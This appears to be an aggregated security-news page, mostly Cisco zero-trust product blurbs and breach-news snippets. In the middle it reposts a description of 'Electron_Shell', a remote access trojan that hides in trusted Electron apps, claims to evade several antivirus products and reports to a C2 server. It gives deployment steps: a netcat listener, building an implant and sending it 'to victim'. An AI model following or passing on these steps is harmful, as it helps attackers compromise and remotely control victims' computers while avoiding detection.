Fusing Security Into the Network Fabric: From Hybrid Mesh Firewalls to Universal ZTNA

In the changing landscape of network security, the combination of Universal Zero Trust Network Access and Hybrid Mesh Firewalls offers a powerful defense.

Simplifying Zero Trust Security for the Modern Workplace

Cisco’s User Protection Suite now includes Identity Services Engine (ISE), enabling organizations to achieve zero trust for the workplace.

The Customer Adoption Journey of Cisco Secure Workload

Explore the customer adoption journey of Cisco Secure Workload, with key stages and best practices for successful implementation highlighted.

Cisco Secure Workload: Leading in Segmentation Maturity

As cyber threats evolve, defending workloads in today’s multi-cloud environments requires more than traditional security. Attackers are no longer simply at the perimeter; they may already be inside, waiting to exploit vulnerabilities. This reality demands a shift from just keeping threats out to minimizing their impact when they breach. Cisco Secure Workload is at the […]

Business Leader’s Guide for a Successful Microsegmentation Project

One of the most effective strategies for protecting your digital assets is microsegmentation. The success lies in how it's implemented and the planning.

You’ve Heard the Security Service Edge (SSE) Story Before, but We Re-Wrote It!

Tech components like MASQUE, QUIC and VPP allow Cisco to overcome the limitations of last-gen ZTNA and SSE solutions. Learn how Cisco is rewriting the ZTA story.

Re-Imagining Zero Trust With an In-Office Experience, Everywhere

Cisco has designed our solution to overcome common obstacles by powering a secure, in-office experience anywhere that builds on Cisco's own zero trust journey.

Seamless Secure Work on a Plane

Learn how Cisco’s User Protection Suite provides fast and secure connection to applications, even while traveling.

Bolster SaaS Security Posture Management with Zero Trust Architecture

Cisco and AppOmni have teamed to extend zero trust principles to secure SaaS applications and data with a closed loop zero trust architecture.

Forrester Names Cisco a Leader in OT Security

Securing industrial networks is top of mind. Cisco’s comprehensive OT security solution and unified IT/OT security platform is a Leader according to Forrester. Learn what makes Cisco stand apart in this market.

Cisco Enhances Zero Trust Access with Google

Cisco and Google are collaborating to help organizations block threats and secure access across internet destinations and private applications.

Windows 11 to Deprecate NTLM, Add AI-Powered App Controls and Security Defenses

 Microsoft on Monday confirmed its plans to deprecate NT LAN Manager (NTLM) in Windows 11 in the second half of the year, as it announced a slew of new security measures to harden the widely-used desktop operating system. "Deprecating NTLM has been a huge ask from our security community as it will strengthen user authentication, and deprecation is planned in the second half of 2024," the

How Attackers Can Own a Business Without Touching the Endpoint

Attackers are increasingly making use of “networkless” attack techniques targeting cloud apps and identities. Here’s how attackers can (and are) compromising organizations – without ever needing to touch the endpoint or conventional networked systems and services.  Before getting into the details of the attack techniques being used, let’s discuss why

Behind the Scenes: The Art of Safeguarding Non-Human Identities

In the whirlwind of modern software development, teams race against time, constantly pushing the boundaries of innovation and efficiency. This relentless pace is fueled by an evolving tech landscape, where SaaS domination, the proliferation of microservices, and the ubiquity of CI/CD pipelines are not just trends but the new norm. Amidst this backdrop, a critical aspect subtly weaves into the

Implementing Zero Trust Controls for Compliance

The ThreatLocker® Zero Trust Endpoint Protection Platform implements a strict deny-by-default, allow-by-exception security posture to give organizations the ability to set policy-based controls within their environment and mitigate countless cyber threats, including zero-days, unseen network footholds, and malware attacks as a direct result of user error. With the capabilities of the

Cisco and Nvidia: Redefining Workload Security

There has been an exponential increase in breaches within enterprises despite the carefully constructed and controlled perimeters that exist around applications and data. Once an attacker can access… Read more on Cisco Blogs

Cisco Secure Access named Leader in Zero Trust Network Access

Zero Trust Network Access (ZTNA) is a critical component to increase productivity and reduce risk in today’s hyper-distributed environments. Cisco Secure Access provides a modern form of zero trust a… Read more on Cisco Blogs

Helping Ivanti VPN Customers

In January 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a directive (with an update in February) mandating that all U.S. Federal agencies take Ivanti systems offline… Read more on Cisco Blogs

Cisco Secure Workload 3.9 Delivers Stronger Security and Greater Operational Efficiency

The proliferation of applications across hybrid and multicloud environments continues at a blistering pace. For the most part, there is no fixed perimeter, applications and environments are woven… Read more on Cisco Blogs

Mitigating Lateral Movement with Zero Trust Access

Security service edge (SSE) technology was created to protect remote and branch users with a unified, cloud-delivered security stack. To understand how SSE solutions protect organizations and their… Read more on Cisco Blogs

Superusers Need Super Protection: How to Bridge Privileged Access Management and Identity Management

Traditional perimeter-based security has become costly and ineffective. As a result, communications security between people, systems, and networks is more important than blocking access with firewalls. On top of that, most cybersecurity risks are caused by just a few superusers – typically one out of 200 users. There’s a company aiming to fix the gap between traditional PAM and IdM

The Real Deal About ZTNA and Zero Trust Access

ZTNA hasn’t delivered on the full promise of zero trust

Zero Trust has been all the rage for several years; it states, “never trust, always verify” and assumes every attempt to access the network or a… Read more on Cisco Blogs

NIS2 compliance for industrial networks: Are you ready?

Since the European Union (EU) signed the second version of the Network and Information Security (NIS2) Directive in December 2022, there has been a real frenzy all around Europe about it. NIS2 is now… Read more on Cisco Blogs

Why Are Compromised Identities the Nightmare to IR Speed and Efficiency?

Incident response (IR) is a race against time. You engage your internal or external team because there's enough evidence that something bad is happening, but you’re still blind to the scope, the impact, and the root cause. The common set of IR tools and practices provides IR teams with the ability to discover malicious files and outbound network connections. However, the identity aspect - namely

Webinar – Leverage Zero Trust Security to Minimize Your Attack Surface

Digital expansion inevitably increases the external attack surface, making you susceptible to cyberthreats. Threat actors increasingly exploit the vulnerabilities stemming from software and infrastructure exposed to the internet; this ironically includes security tools, particularly firewalls and VPNs, which give attackers direct network access to execute their attacks. In fact, Gartner&

Electron_Shell - Developing A More Covert Remote Access Trojan (RAT) Tool By Leveraging Electron's Features For Command Injection And Combining It With Remote Control Methods

Electron_shell

Features

• Supports almost all operating systems

  • mac
  • linux
  • windows

• Supports almost all desktop applications developed based on Electron

  • QQ
  • Microsoft Team
  • Discord
  • GitHubDesktop
  • 淘宝直播
  • vscode
  • and more (https://en.wikipedia.org/wiki/List_of_software_using_Electron)

•  All malicious operations are executed by the injected program, those commonly used trusted programs

• Bypass of Network Access Control Policy for Applications by Zero Trust Sandbox

• Verified that it will not be discovered by the antivirus software below

  (Please note that a simple command call has been implemented here, and some behavior based heuristic checks will still prompt , bypass AV is not a key issue to be addressed in this project)

  • Windows Defender
  • avast
  • 火绒
  • 360
  • 腾讯管家
  • virustotal

Intro

An increasing number of desktop applications are opting for the Electron framework.

Electron provides a method that can be debugged, usually by utilizing Chrome's inspect function or calling inspect through Node.js. In this project, the implementation of inspect was analyzed, and a method for automatically parasitizing common Electron programs was developed.

By establishing a connection with the Command and Control (C2) server, a simple remote control is achieved.

Due to the widespread trust of most antivirus software in these well-known applications (with digital signatures), executing malicious commands in the program context provides excellent concealment and stability.

For these injected applications, it is necessary to carefully consider the potential legal risks brought by such actions. When users analyze program behavior, they may be surprised to find that the parent process executing malicious behavior comes from the application they trust.

 Usage

C2 Server Setup

1. Deploy a server and obtain a public IP address
2. and then exec command: nc -lvnp 8899

Generating Implants

1. clone this project

2. modify build.config

   injected_app:  The electron program you want to inject
   c2:            set c2_Public IP and c2_netcat Port
   

3. exec node build.js, and then pkg to an execute program

4. Send to victim, and get electron_shell 

Cyolo Product Overview: Secure Remote Access to All Environments

Operational technology (OT) cybersecurity is a challenging but critical aspect of protecting organizations' essential systems and resources. Cybercriminals no longer break into systems, but instead log in – making access security more complex and also more important to manage and control than ever before. In an effort to solve the access-related challenges facing OT and critical infrastructure

Whodunnit? Cybercrook gets 6 years for ransoming his own employer

Not just an active adversary, but a two-faced one, too.

LastPass source code breach – incident response report released

Wondering how you'd handle a data breach report if the worst happened to you? Here's a useful example.

GitHub issues final report on supply-chain source code intrusions

Learn how to find out which apps you've given access rights to, and how to revoke those rights immediately in an emergency.